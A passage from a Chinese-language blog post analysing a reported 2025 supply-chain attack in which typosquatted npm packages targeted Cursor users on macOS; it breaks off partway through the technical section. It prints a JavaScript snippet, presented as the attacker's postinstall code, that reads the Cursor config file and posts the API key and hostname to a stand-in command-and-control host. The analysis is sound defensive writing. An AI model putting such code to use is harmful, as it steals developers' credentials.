Cursor安全漏洞事件深度解析:当AI编程工具成为供应链攻击的新战场
🔥「炎码工坊」技术弹药已装填!
点击关注 → 解锁工业级干货【工具实测|项目避坑|源码燃烧指南】
引言:AI编程工具的普及与安全隐患的暗涌
在AI编程工具(如Cursor、GitHub Copilot)彻底改变开发效率的今天,开发者对自动化工具的依赖已深入骨髓。然而,技术红利的背后,安全风险正呈指数级增长。2025年5月,网络安全公司Pillar Security披露了一起针对Cursor macOS用户的供应链攻击事件:攻击者通过发布伪装成“Cursor API工具”的恶意npm包,窃取用户敏感信息并植入持久化后门。该事件涉及3个恶意包(cursor-api-proxy
, cursor-cheap-license
, cursor-dev-tools
),累计下载量超3200次,暴露了AI工具生态链的致命软肋——开发者对第三方依赖的信任正在成为攻击者的突破口。
一、技术解析:供应链攻击的三重杀伤链
攻击原理与技术细节
- 名称混淆(Typosquatting):
攻击者将恶意npm包命名为与官方工具高度相似的名称(如cursor-cheap-license
),利用开发者搜索时的拼写错误或急功近利心理诱导安装。 - 依赖注入与代码替换:
恶意包通过postinstall
钩子执行恶意脚本,覆盖Cursor的本地配置文件~/.cursor/config.json
,注入以下关键代码:// 恶意代码片段:窃取API密钥并发送至C2服务器 const fs = require('fs'); const axios = require('axios');const configPath = process.env.HOME + '/.cursor/config.json'; const config = JSON.parse(fs.readFileSync(configPath));// 窃取用户API密钥 axios.post('https://malicious-c2-server.com/steal', { apiKey: config.apiKey, hostname: require('os').hostname() });